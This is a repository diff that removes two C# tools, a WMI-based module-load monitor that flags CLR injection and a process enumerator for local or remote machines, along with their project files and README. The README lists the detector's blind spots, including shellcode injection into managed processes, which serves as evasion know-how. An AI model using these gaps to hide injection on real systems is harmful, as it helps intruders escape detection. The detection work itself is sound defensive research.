MonitorModuleLoads(new List<string>());
}
/// <summary>
/// Struct representing the WMI class Win32_ModuleLoadTrace
/// </summary>
[StructLayout(LayoutKind.Sequential)]
public struct Win32_ModuleLoadTrace
{
public sbyte[] SECURITY_DESCRIPTOR;
public UInt64 TIME_CREATED;
public string FileName;
public UInt64 DefaultBase;
public UInt64 ImageBase;
public UInt32 ImageChecksum;
public UInt64 ImageSize;
public UInt32 ProcessID;
public UInt32 TimeDateSTamp;
}
/// <summary>
/// Overload of GetNextModuleLoad that does not require filters.
/// </summary>
/// <returns></returns>
public static Win32_ModuleLoadTrace GetNextModuleLoad()
{
return GetNextModuleLoad(new List<string>());
}
/// <summary>
/// Get the details of the next module load
/// </summary>
/// <param name="filters">Filenames to filter for.</param>
/// <returns></returns>
public static Win32_ModuleLoadTrace GetNextModuleLoad(List<string> filters)
{
Win32_ModuleLoadTrace trace = new Win32_ModuleLoadTrace();
//Ideally, we would filter here to reduce the amount of events that we have to consume.
//However, we cannot use the WHERE clause because the
var startWatch = new ManagementEventWatcher(new WqlEventQuery("SELECT * FROM Win32_ModuleLoadTrace"));
ManagementBaseObject e = startWatch.WaitForNextEvent();
//Instead, we filter here, because it's easy and we're a bit lazy
if (filters.Count == 0 ^ filters.Contains(((ManagementBaseObject)e)["FileName"].ToString()))
{
if (((ManagementBaseObject)e)["SECURITY_DESCRIPTOR"] != null)
trace.SECURITY_DESCRIPTOR = (sbyte[])((ManagementBaseObject)e)["SECURITY_DESCRIPTOR"];
if (((ManagementBaseObject)e)["TIME_CREATED"] != null)
trace.TIME_CREATED = (UInt64)((ManagementBaseObject)e)["TIME_CREATED"];
if (((ManagementBaseObject)e)["FileName"] != null)
trace.FileName = (string)((ManagementBaseObject)e)["FileName"];
if (((ManagementBaseObject)e)["DefaultBase"] != null)
trace.DefaultBase = (UInt64)((ManagementBaseObject)e)["DefaultBase"];
if (((ManagementBaseObject)e)["ImageBase"] != null)
trace.ImageBase = (UInt64)((ManagementBaseObject)e)["ImageBase"];
if (((ManagementBaseObject)e)["ImageChecksum"] != null)
trace.ImageChecksum = (UInt32)((ManagementBaseObject)e)["ImageChecksum"];
if (((ManagementBaseObject)e)["ImageSize"] != null)
trace.ImageSize = (UInt64)((ManagementBaseObject)e)["ImageSize"];
if (((ManagementBaseObject)e)["ProcessID"] != null)
trace.ProcessID = (UInt32)((ManagementBaseObject)e)["ProcessID"];
if (((ManagementBaseObject)e)["TimeDateSTamp"] != null)
trace.TimeDateSTamp = (UInt32)((ManagementBaseObject)e)["TimeDateSTamp"];
return trace;
}
else
return trace;
}
public static void CLRSentry()
{
//Sentries never sleep.
//UCMJ Article 113
/* Any sentinel or look-out who is found drunk or sleeping upon his post,
* or leaves it before he is regularly relieved, shall be punished,
* if the offense is committed in time of war, by death or such other punishment as a court-martial may direct,
* by if the offense is committed at any other time,
* by such punishment other than death as court-martial may direct.
*/
while (true)
{
//Get the module load.
Win32_ModuleLoadTrace trace = GetNextModuleLoad();
//Split the
string[] parts = trace.FileName.Split('\\');
//Check whether it is a .NET Runtime DLL
if (parts[parts.Length - 1].Contains("msco"))
{
Process proc = Process.GetProcessById((int) trace.ProcessID);
//Check if the file is a .NET Assembly
if (!IsValidAssembly(proc.StartInfo.FileName))
{
//If it is not, then the CLR has been injected.
Console.WriteLine();
Console.WriteLine("[!] CLR Injection has been detected!");
//Display information from the event
Console.WriteLine("[>] Process {0} has loaded the CLR but is not a .NET Assembly:", trace.ProcessID);
Console.WriteLine("{0,15} Win32_ModuleLoadTrace:", "[!]");
DateTime time = new DateTime();
DateTime.TryParse(trace.TIME_CREATED.ToString(), out time);
time.ToLocalTime();
//TODO: Time is printing strangley
Console.WriteLine("{0,15} (Event) TIME_CREATED: {1}", "[+]", time.ToString());
//TODO: Convert to hex
Console.WriteLine("{0,15} (Process) ImageBase: {1}", "[+]", trace.ImageBase);
Console.WriteLine("{0,15} (Process) DefaultBase: {1}", "[+]", trace.DefaultBase);
Console.WriteLine("{0,15} (Module) FileName: {1}", "[+]", trace.FileName);
Console.WriteLine("{0,15} (Module) TimeStamp: {1}", "[+]", trace.TimeDateSTamp);
Console.WriteLine("{0,15} (Module) ImageSize: {1}", "[+]", trace.ImageSize);
Console.WriteLine("{0,15} (Module) ImageChecksum: {1}", "[+]", trace.ImageChecksum);
Console.WriteLine("{0,15} Additional Information:", "[>]");
Process process = SafeGetProcessByID(int.Parse(trace.ProcessID.ToString()));
if (process != null)
{
Console.WriteLine("{0,30} Process Name: {1}", "[+]", process.ProcessName);
Console.WriteLine("{0,30} Process User: {1}", "[+]", GetProcessUser(process));
}
}
}
}
}
/// <summary>
/// Check if the file is a .NET Assembly by cheating and using the Reflection API's PE Parser.
///
/// https://stackoverflow.com/questions/36797939/how-to-test-whether-a-file-is-a-net-assembly-in-c-sharp
/// </summary>
/// <param name="path">The file to check</param>
/// <returns>True if a .NET Assembly, false if not. Hopefully.</returns>
public static bool IsValidAssembly(string path)
{
try
{
// Attempt to resolve the assembly
var assembly = System.Reflection.AssemblyName.GetAssemblyName(path);
// Nothing blew up, so it's an assembly
return true;
}
catch (Exception ex)
{
// Something went wrong, it is not an assembly (specifically a
// BadImageFormatException will be thrown if it could be found
// but it was NOT a valid assembly
return false;
}
}
/// <summary>
/// Monitor for module loads using the WMI Event Win32_ModuleLoadTrace. Optionally filter by module names.
/// </summary>
/// <param name="filters">A list of module names to filter for.</param>
public static void MonitorModuleLoads(List<string> filters)
{
Console.WriteLine("Monitoring Win32_ModuleLoadTrace...\n");
while (true)
{
Win32_ModuleLoadTrace trace = new Win32_ModuleLoadTrace();
Win32_ModuleLoadTrace tracecomp = new Win32_ModuleLoadTrace();
//Get the details of the next module load
trace = GetNextModuleLoad(filters);
//If the trace is not empty
if (!trace.Equals(tracecomp))
{
Console.WriteLine();
//Display information from the event
Console.WriteLine("[>] Process {0} has loaded a module:", trace.ProcessID);
Console.WriteLine("{0,15} Win32_ModuleLoadTrace:", "[!]");
DateTime time = new DateTime();
DateTime.TryParse(trace.TIME_CREATED.ToString(), out time);
time.ToLocalTime();
//TODO: Time is printing strangley
Console.WriteLine("{0,15} (Event) TIME_CREATED: {1}", "[+]", time.ToString());
//TODO: Convert to hex
Console.WriteLine("{0,15} (Process) ImageBase: {1}", "[+]", trace.ImageBase);
Console.WriteLine("{0,15} (Process) DefaultBase: {1}", "[+]", trace.DefaultBase);
Console.WriteLine("{0,15} (Module) FileName: {1}", "[+]", trace.FileName);
Console.WriteLine("{0,15} (Module) TimeStamp: {1}", "[+]", trace.TimeDateSTamp);
Console.WriteLine("{0,15} (Module) ImageSize: {1}", "[+]", trace.ImageSize);
Console.WriteLine("{0,15} (Module) ImageChecksum: {1}", "[+]", trace.ImageChecksum);
Console.WriteLine("{0,15} Additional Information:", "[>]");
Process process = SafeGetProcessByID(int.Parse(trace.ProcessID.ToString()));
if (process != null)
{
Console.WriteLine("{0,30} Process Name: {1}", "[+]", process.ProcessName);
Console.WriteLine("{0,30} Process User: {1}", "[+]", GetProcessUser(process));
}
}
}
}
[DllImport("advapi32.dll", SetLastError = true)]
private static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
[DllImport("kernel32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CloseHandle(IntPtr hObject);
/// <summary>
/// Gets the owner of a process.
///
/// https://stackoverflow.com/questions/777548/how-do-i-determine-the-owner-of-a-process-in-c
/// </summary>
/// <param name="process">The process to inspect.</param>
/// <returns>The name of the user, or null if it could not be read.</returns>
public static string GetProcessUser(Process process)
{
IntPtr processHandle = IntPtr.Zero;
try
{
OpenProcessToken(process.Handle, 8, out processHandle);
WindowsIdentity wi = new WindowsIdentity(processHandle);
return wi.Name;
}
catch (Exception ex)
{
return ex.Message;
}
finally
{
if (processHandle != IntPtr.Zero)
{
CloseHandle(processHandle);
}
}
}//end method
/// <summary>
/// Try to get the process by ID and return null if it no longer exists.
/// </summary>
/// <param name="id"></param>
/// <returns></returns>
private static Process SafeGetProcessByID(int id)
{
try
{
return Process.GetProcessById(id);
}
catch
{
return null;
}
}
private static void PrintUsage()
{
Console.WriteLine();
Console.WriteLine("| Module Monitor [v0.1]");
Console.WriteLine("| Copyright (c) 2019 TheWover");
Console.WriteLine();
Console.WriteLine("Usage: ModuleMonitor.exe [--clr-sentry]");
Console.WriteLine();
Console.WriteLine("{0,-5} {1,-20} {2}", "", "-h, --help", "Display this help menu.");
Console.WriteLine("{0,-5} {1,-20} {2}", "", "--clr-sentry", "Monitor for CLR injection.");
Console.WriteLine();
Console.WriteLine("Examples:");
Console.WriteLine();
Console.WriteLine("ModuleMonitor.exe");
Console.WriteLine("ModuleMonitor.exe --clr-monitor");
Console.WriteLine();
}
}//end class
}//end namespace

36
ModuleMonitor/Properties/AssemblyInfo.cs
View File

@ -1,36 +0,0 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("ModuleMonitor")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("ModuleMonitor")]
[assembly: AssemblyCopyright("Copyright © 2019")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("361c69f5-7885-4931-949a-b91eeab170e3")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]

26
ModuleMonitor/README.md
View File

@ -1,26 +0,0 @@
# ModuleMonitor
Has its own repo at: https://github.com/TheWover/ModuleMonitor
Uses WMI Event Win32_ModuleLoadTrace to monitor module loading. Provides filters, and detailed data. Has an option to monitor for CLR Injection attacks.
The CLR Sentry option follows some simple logic: If a process loads the CLR, but the program is not a .NET program, then the CLR has been injected into it.
While useful, there are both false positives and false negatives:
* False Postiive: There are (few) legitimate uses of the Unmanaged CLR Hosting API. If there weren't, then Microsoft wouldn't have made it. CLR Sentry will notice every unmanaged program that loads the CLR.
* False Negatives: This will NOT notice injection of .NET code into processes that already have the CLR loaded. So, no use of the Reflection API and not when donut is used to inject shellcode into managed processes.
Please Note: This is intended only as a Proof-of-Concept to demonstrate the anomalous behavior produced by CLR injection and how it may be detected. It should not be used in any way in a production environment. You perform the same logic with the ``` Image Load ``` event for Sysmon or ETW. They would be easier to scale and integrate with enterprise tooling.
![Alt text](https://github.com/TheWover/donut/blob/master/ModuleMonitor/img/detected.png?raw=true "CLR Sentry detection")
# Usage
```
| Module Monitor [v0.1]
| Copyright (c) 2019 TheWover
Usage: ModuleMonitor.exe [--clr-sentry]
```

3
ModuleMonitor/app.config
View File

@ -1,3 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2"/></startup></configuration>

76
ModuleMonitor/app.manifest
View File

@ -1,76 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<!-- UAC Manifest Options
If you want to change the Windows User Account Control level replace the
requestedExecutionLevel node with one of the following.
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
<requestedExecutionLevel level="highestAvailable" uiAccess="false" />
Specifying requestedExecutionLevel element will disable file and registry virtualization.
Remove this element if your application requires this virtualization for backwards
compatibility.
-->
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- A list of the Windows versions that this application has been tested on
and is designed to work with. Uncomment the appropriate elements
and Windows will automatically select the most compatible environment. -->
<!-- Windows Vista -->
<!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" />-->
<!-- Windows 7 -->
<!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" />-->
<!-- Windows 8 -->
<!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />-->
<!-- Windows 8.1 -->
<!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" />-->
<!-- Windows 10 -->
<!--<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}" />-->
</application>
</compatibility>
<!-- Indicates that the application is DPI-aware and will not be automatically scaled by Windows at higher
DPIs. Windows Presentation Foundation (WPF) applications are automatically DPI-aware and do not need
to opt in. Windows Forms applications targeting .NET Framework 4.6 that opt into this setting, should
also set the 'EnableWindowsFormsHighDpiAutoResizing' setting to 'true' in their app.config. -->
<!--
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
</application>
-->
<!-- Enable themes for Windows common controls and dialogs (Windows XP and later) -->
<!--
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
-->
</assembly>

BIN
ModuleMonitor/img/detected.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 158 KiB

6
ProcessManager/App.config
View File

@ -1,6 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup>
<supportedRuntime version="v2.0.50727"/></startup>
</configuration>

29
ProcessManager/LICENSE
View File

@ -1,29 +0,0 @@
BSD 3-Clause License
Copyright (c) 2019, TheWover
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

57
ProcessManager/ProcessManager.csproj
View File

@ -1,57 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{98CA74C7-A074-434D-9772-75896E73CEAA}</ProjectGuid>
<OutputType>Exe</OutputType>
<RootNamespace>ProcessManager</RootNamespace>
<AssemblyName>ProcessManager</AssemblyName>
<TargetFrameworkVersion>v3.5</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
<Deterministic>true</Deterministic>
<TargetFrameworkProfile />
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Management" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Net.Http" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<None Include="App.config" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>

11
ProcessManager/ProcessManager.csproj.user
View File

@ -1,11 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|AnyCPU'">
<StartArguments>
</StartArguments>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'">
<StartArguments>
</StartArguments>
</PropertyGroup>
</Project>

25
ProcessManager/ProcessManager.sln
View File

@ -1,25 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.28307.136
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ProcessManager", "ProcessManager.csproj", "{98CA74C7-A074-434D-9772-75896E73CEAA}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{98CA74C7-A074-434D-9772-75896E73CEAA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{98CA74C7-A074-434D-9772-75896E73CEAA}.Debug|Any CPU.Build.0 = Debug|Any CPU
{98CA74C7-A074-434D-9772-75896E73CEAA}.Release|Any CPU.ActiveCfg = Release|Any CPU
{98CA74C7-A074-434D-9772-75896E73CEAA}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {EA625DA1-2E6D-4092-B504-DEE5CD2E9F43}
EndGlobalSection
EndGlobal

579
ProcessManager/Program.cs
View File

@ -1,579 +0,0 @@
/** Name: ProcessManager
* Author: TheWover
* Description: Displays useful information about processes running on a local or remote machine.
*
* Last Modified: 04/13/2018
*
*/
using System;
using System.Linq;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.ComponentModel;
using System.Security.Principal;
namespace ProcessManager
{
class Program
{
private struct Arguments
{
public string processname;
public string machinename;
public bool help;
}
static void Main(string[] args)
{
//Parse command-line arguments
Arguments arguments = ParseArgs(args);
if (args.Length > 0)
{
if (arguments.help == true)
{
PrintUsage();
Environment.Exit(0);
}
Console.WriteLine("{0,-30} {1,-10} {2,-10} {3,-10} {4,-10} {5,-10} {6,-10} {7}", "Process Name", "PID", "PPID", "Arch", "Managed", "Session", "Integrity", "User");
//If the user specifed that a different machine should be used, then parse for the machine name and run the command.
if (arguments.machinename != null)
{
try
{
if (arguments.processname != null)
//Enumerate the processes
DescribeProcesses(Process.GetProcessesByName(arguments.processname, arguments.machinename));
else
//Enumerate the processes
DescribeProcesses(Process.GetProcesses(arguments.machinename));
}
catch
{
Console.WriteLine("Error: Invalid machine name.");
Environment.Exit(1);
}
}
else
{
if (arguments.processname != null)
//Enumerate the processes
DescribeProcesses(Process.GetProcessesByName(arguments.processname));
else
//Enumerate the processes
DescribeProcesses(Process.GetProcesses());
}
}
else
{
Console.WriteLine("{0,-30} {1,-10} {2,-10} {3,-10} {4,-10} {5,-10} {6,-10} {7}", "Process Name", "PID", "PPID", "Arch", "Managed", "Session", "Integrity" , "User");
DescribeProcesses(Process.GetProcesses());
}
}
private static Arguments ParseArgs(string[] args)
{
Arguments arguments = new Arguments();
arguments.help = false;
arguments.machinename = null;
arguments.processname = null;
if (args.Length > 0)
{
if (args.Contains("--help") || args.Contains("-h"))
{
arguments.help = true;
}
}
//Filter by process name
if (args.Contains("--name") && args.Length >= 2)
{
//The number of the command line argument that specifies the process name
int nameindex = new System.Collections.Generic.List<string>(args).IndexOf("--name") + 1;
arguments.processname = args[nameindex];
}
//If the user specifed that a different machine should be used, then parse for the machine name and run the command.
if (args.Contains("--machine") && args.Length >= 2)
{
try
{
//The number of the command line argument that specifies the machine name
int machineindex = new System.Collections.Generic.List<string>(args).IndexOf("--machine") + 1;
arguments.machinename = args[machineindex];
}
catch
{
Console.WriteLine("Error: Invalid machine name.");
Environment.Exit(1);
}
}
return arguments;
}
private static void PrintUsage()
{
Console.WriteLine();
Console.WriteLine("| Process Manager [v0.2]");
Console.WriteLine("| Copyright (c) 2019 TheWover");
Console.WriteLine();
Console.WriteLine("Usage: ProcessManager.exe [machine]");
Console.WriteLine();
Console.WriteLine("{0,-5} {1,-20} {2}", "", "-h, --help", "Display this help menu.");
Console.WriteLine("{0,-5} {1,-20} {2}", "", "--machine", "Specify a machine to query. Machine name or IP Address may be used.");
Console.WriteLine("{0,-5} {1,-20} {2}", "", "--name", "Filter by a process name.");
Console.WriteLine();
Console.WriteLine("Examples:");
Console.WriteLine();
Console.WriteLine("ProcessManager.exe");
Console.WriteLine("ProcessManager.exe --name svchost");
Console.WriteLine("ProcessManager.exe --machine workstation2");
Console.WriteLine("ProcessManager.exe --machine 10.30.134.13");
Console.WriteLine();
}
private static void DescribeProcesses(Process[] processes)
{
//Sort in ascending order by PID
processes = processes.OrderBy(p => p.Id).ToArray();
foreach (Process process in processes)
{
//Get the PID
ProcessDetails details = new ProcessDetails();
details.name = process.ProcessName;
details.pid = process.Id;
try
{
//Get the PPID
Process parent = ParentProcessUtilities.GetParentProcess(process.Id);
if (parent != null)
details.ppid = parent.Id;
else
details.ppid = -1;
}
//Parent is no longer running
catch (InvalidOperationException)
{
details.ppid = -1;
}
//Check the architecture
try
{
if (ProcessInspector.IsWow64Process(process))
details.arch = "x86";
else
details.arch = "x64";
}
catch
{
details.arch = "*";
}
try
{
//Determine whether or not the process is managed (has the CLR loaded).
details.managed = ProcessInspector.IsCLRLoaded(process);
}
//Process is no longer running
catch (InvalidOperationException)
{
details.managed = false;
}
try
{
//Gets the Session of the Process
details.session = process.SessionId;
}
//Process is no longer running
catch (InvalidOperationException)
{
details.session = -1;
}
try
{
//Gets the Integrity Level of the process
details.integrity = TokenInspector.GetIntegrityLevel(process);
}
//Process is no longer running
catch (InvalidOperationException)
{
details.integrity = TokenInspector.IntegrityLevel.Unknown;
}
try
{
//Gets the User of the Process
details.user = ProcessInspector.GetProcessUser(process);
}
//Process is no longer running
catch (InvalidOperationException)
{
details.user = "";
}
Console.WriteLine("{0,-30} {1,-10} {2,-10} {3,-10} {4,-10} {5,-10} {6,-10} {7}", details.name, details.pid, details.ppid, details.arch, details.managed, details.session, details.integrity, details.user);
}
}
}
public struct ProcessDetails
{
public string name;
public int pid;
public int ppid;
public string arch;
public bool managed;
public int session;
public TokenInspector.IntegrityLevel integrity;
public string user;
}
public static class ProcessInspector
{
[System.Runtime.InteropServices.DllImport("kernel32.dll")]
public static extern bool IsWow64Process(System.IntPtr hProcess, out bool lpSystemInfo);
[DllImport("ntdll.dll")]
private static extern int NtQueryInformationProcess(IntPtr processHandle, int processInformationClass, ref ParentProcessUtilities processInformation, int processInformationLength, out int returnLength);
[DllImport("advapi32.dll", SetLastError = true)]
private static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
[DllImport("kernel32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CloseHandle(IntPtr hObject);
/// <summary>
/// Gets the parent process of a specified process.
/// </summary>
/// <returns>A Process object representing the parent.</returns>
public static Process GetParentProcess(Process process)
{
return ParentProcessUtilities.GetParentProcess(process.Id);
}
/// <summary>
/// Gets the parent process of a specified process.
/// </summary>
/// <returns>A Process object representing the parent.</returns>
public static Process GetParentProcess()
{
return GetParentProcess(Process.GetCurrentProcess());
}
/// <summary>
/// Checks whether the process is 64-bit.
/// </summary>
/// <returns>Returns true if process is 64-bit, and false if process is 32-bit.</returns>
public static bool IsWow64Process(Process process)
{
bool retVal = false;
IsWow64Process(process.Handle, out retVal);
return retVal;
}
/// <summary>
/// Checks whether the process is 64-bit.
/// </summary>
/// <returns>Returns false if process is 64-bit, and true if process is 32-bit. Refer to MSDN for further details.</returns>
public static bool IsWow64Process()
{
bool retVal = false;
IsWow64Process(Process.GetCurrentProcess().Handle, out retVal);
return retVal;
}
/// <summary>
/// Checks if the CLR has been loaded into the specified process by
/// looking for loaded modules that contain "mscor" in the name.
/// </summary>
/// <param name="process">The process to check.</param>
/// <returns>True if the CLR has been loaded. False if it has not.</returns>
public static bool IsCLRLoaded(Process process)
{
try
{
var modules = from module in process.Modules.OfType<ProcessModule>()
select module;
return modules.Any(pm => pm.ModuleName.Contains("mscor"));
}
//Access was denied
catch (Win32Exception)
{
return false;
}
//Process has already exited
catch (InvalidOperationException)
{
return false;
}
}
/// <summary>
/// Gets the owner of a process.
///
/// https://stackoverflow.com/questions/777548/how-do-i-determine-the-owner-of-a-process-in-c
/// </summary>
/// <param name="process">The process to inspect.</param>
/// <returns>The name of the user, or null if it could not be read.</returns>
public static string GetProcessUser(Process process)
{
IntPtr processHandle = IntPtr.Zero;
try
{
OpenProcessToken(process.Handle, 8, out processHandle);
WindowsIdentity wi = new WindowsIdentity(processHandle);
return wi.Name;
}
catch
{
return null;
}
finally
{
if (processHandle != IntPtr.Zero)
{
CloseHandle(processHandle);
}
}
}
}//end class
/// <summary>
/// A utility class to determine a process parent.
/// </summary>
[StructLayout(LayoutKind.Sequential)]
public struct ParentProcessUtilities
{
// These members must match PROCESS_BASIC_INFORMATION
internal IntPtr Reserved1;
internal IntPtr PebBaseAddress;
internal IntPtr Reserved2_0;
internal IntPtr Reserved2_1;
internal IntPtr UniqueProcessId;
internal IntPtr InheritedFromUniqueProcessId;
[DllImport("ntdll.dll")]
private static extern int NtQueryInformationProcess(IntPtr processHandle, int processInformationClass, ref ParentProcessUtilities processInformation, int processInformationLength, out int returnLength);
/// <summary>
/// Gets the parent process of the current process.
/// </summary>
/// <returns>An instance of the Process class.</returns>
public static Process GetParentProcess()
{
return GetParentProcess(Process.GetCurrentProcess().Handle);
}
/// <summary>
/// Gets the parent process of specified process.
/// </summary>
/// <param name="id">The process id.</param>
/// <returns>An instance of the Process class.</returns>
public static Process GetParentProcess(int id)
{
try
{
Process process = Process.GetProcessById(id);
GetParentProcess(process.Handle);
return GetParentProcess(process.Handle);
}
//Access was denied, or
catch
{
return null;
}
}
/// <summary>
/// Gets the parent process of a specified process.
/// </summary>
/// <param name="handle">The process handle.</param>
/// <returns>An instance of the Process class.</returns>
public static Process GetParentProcess(IntPtr handle)
{
ParentProcessUtilities pbi = new ParentProcessUtilities();
int returnLength;
int status = NtQueryInformationProcess(handle, 0, ref pbi, Marshal.SizeOf(pbi), out returnLength);
if (status != 0)
throw new Win32Exception(status);
try
{
return Process.GetProcessById(pbi.InheritedFromUniqueProcessId.ToInt32());
}
catch (ArgumentException)
{
// not found
return null;
}
}
}
/// <summary>
/// Inspects the tokens of an arbitrary Process and reports useful information.
///
/// This class is almost entirely copied from the example provided by pinvoke.net:
/// http://pinvoke.net/default.aspx/Constants/SECURITY_MANDATORY.html
/// </summary>
public class TokenInspector
{
[DllImport("advapi32.dll", SetLastError = true)]
static extern IntPtr GetSidSubAuthority(IntPtr sid, UInt32 subAuthorityIndex);
[DllImport("advapi32.dll", SetLastError = true)]
static extern IntPtr GetSidSubAuthorityCount(IntPtr sid);
// winnt.h, Windows SDK v6.1
const int SECURITY_MANDATORY_UNTRUSTED_RID = (0x00000000);
const int SECURITY_MANDATORY_LOW_RID = (0x00001000);
